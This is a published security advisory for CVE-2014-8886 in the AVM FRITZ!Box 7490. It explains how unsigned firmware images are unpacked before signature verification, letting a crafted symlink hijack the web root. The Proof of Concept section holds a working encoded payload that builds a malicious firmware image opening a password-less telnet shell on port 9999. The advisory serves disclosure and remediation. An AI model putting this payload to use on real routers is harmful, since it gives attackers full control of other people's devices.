AVM FRITZ!Box: Arbitrary Code Execution Via Firmware Images

`Advisory: AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated  
Firmware Images  
  
The firmware upgrade process of the FRITZ!Box 7490 is flawed. Specially  
crafted firmware images can overwrite critical files. Arbitrary code can  
get executed if an attempt is made to install such a manipulated  
firmware.  
  
  
Details  
=======  
  
Product: AVM FRITZ!Box 7490, possibly others  
Affected Versions: versions prior to 6.30 [0]  
Fixed Versions: >= 6.30 [0]  
Vulnerability Type: Authenticated Code Execution  
Security Risk: medium  
Vendor URL: http://avm.de/  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-014  
Advisory Status: published  
CVE: CVE-2014-8886  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8886  
  
  
Introduction  
============  
  
FRITZ!Box is the brand name of SOHO routers/CPE manufactured by AVM  
GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a  
wifi access point, routing, VoIP, NAS and DECT.  
  
  
More Details  
============  
  
AVM regularly publishes firmware updates to address bugs and to  
introduce new features. The firmware image can either be uploaded  
manually or the FRITZ!Box downloads it semi-automatically from  
http://download.avm.de/ via unencrypted HTTP if a new version is  
available.  
  
Technically, AVM firmware images are tar files:  
  
$ tar --list --file FRITZ.Box_7490.113.06.20.image  
./var/  
./var/install  
./var/chksum  
./var/info.txt  
./var/tmp/  
./var/tmp/filesystem.image  
./var/tmp/kernel.image  
./var/regelex  
./var/signature  
  
When transferred to the FRITZ!Box, updates are extracted to the root  
directory before their cryptographic signature is verified. Thus,  
critical files can be overwritten by specially crafted firmware images.  
Attackers can use this weakness to execute arbitrary code.  
  
For example, the root directory of the web interface is located at  
/var/html (ramdisk), which is a symlink that points to /usr/www/avm  
(read-only squashfs). If the victim uploads a tar file that contains a  
symlink called ./var/html, the web server's root directory is relocated  
to whatever the malicious symlink points to, e.g. ./var/redteam. There,  
attackers can place arbitrary content, such as CGIs. Once invoked by a  
browser, arbitrary code can be executed.  
  
As the signature check will inevitably fail, the victim will be asked  
whether the unsigned firmware image should be processed or not. That  
confirmation page is formatted by CSS. As a result, the victim's browser  
will try to reload the main.css, which is now under the control of the  
attacker. The attacker can manipulate the main.css to trick the victim's  
browser into loading an attacker-controlled CGI. In total, the upload of  
a manipulated firmware image can immediately lead to code execution  
without the need of further action by the victim.  
  
  
Proof of Concept  
================  
  
The following command generates a firmware image that leads to code  
execution when uploaded to a FRITZ!Box 7490. As soon as the FRITZ!Box  
reports the signature mismatch, a password-less telnetd listening on  
port 9999 will be started.  
  
------------------------------------------------------------------------  
$ base64 -d <<EOF | gunzip > poc.image  
H4sICGITeVYAA3BvYy5pbWFnZQDt1dtunDAQBmCueYoJUaX2AgwsLMruKjd9jd4YPBwUYyPb  
JI2qvnsNOQhVWuWiOajKfGLFwUb+2dFAwm65Yb0bZfBmUq+qqmWfVWW63T95Pi7yXZBmxS7f  
B5Cv2QwKh3x8q3CzddwABD1XPQ7n5700/p9Ktv8xa7ohrgfFJt284hoP9S/P1r9I90GWF1lV  
+F+5X+pf7fIA0lfMcNYnr//lBVsKbvuQzdYwu5w4lAqdgFjC4yDEE1x54c0gJZcS2sGMd9xg  
03YhNr2GGCH6rpVD5WJ3P+EBHP50bJJ8UD9U9DhJQXRa3jXXp1qL++vN5Ylbe6eNiCVaC08J  
em6hRlSwFMmhAO5g0satYRJYkgzKj6kGLeh2G8vfe4sPNy+hUSTbEGxd/7S++HyMj67Cx/mr  
/61lAls+S8dGX7nEX/j3Ndb+L8/3f7Yrnvs/9Y2fZvuyqKj/38PSAPArrHlz0xk9KxE3Wmpz  
gMu2bbEWx9A/dde7A6Rfjttpw8g73+WzkV+jJGF+23w8om/H8Pcn7ipCCCGEEEIIIYQQQggh  
hBBCCCHkff0BF28hMgAoAAA=  
EOF  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
Check each firmware image manually for suspicious file names, before  
uploading to the FRITZ!Box. A more precise workaround does not exist at  
the moment.  
  
  
Fix  
===  
  
Customers should upgrade to a fixed firmware version as soon as  
possible. Before upgrading, they should check the new firmware image for  
suspicious file names (see "Workaround").  
  
  
Security Risk  
=============  
  
This vulnerability allows an attacker to inject arbitrary code into AVM  
firmware images. If the attacker is able to perform a man-in-the-middle  
attack between the AVM FRITZ!Box and http://download.avm.de/, firmware  
images can be manipulated in transit. Otherwise, attackers need to trick  
their victims into installing a malicious firmware image. While  
successful attacks result in the full compromise of a device, they would  
typically require an attacker in a very strong position. The  
vulnerability is therefore considered to pose a medium risk.  
  
  
Timeline  
========  
  
2014-10-14 Vulnerability identified  
2014-10-16 Vendor notified  
2014-11-11 CVE requested  
2014-11-11 Vendor announced patch  
2014-11-14 CVE number assigned  
2014-11-17 Vendor provided fixed version to RedTeam Pentesting  
2015-07-16 Vendor started releasing fixed versions (7490 [0])  
2015-10-01 Vendor finished releasing fixed versions (other models)  
2016-01-07 Advisory released  
  
  
References  
==========  
  
[0] https://avm.de/service/sicherheitshinweise/  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`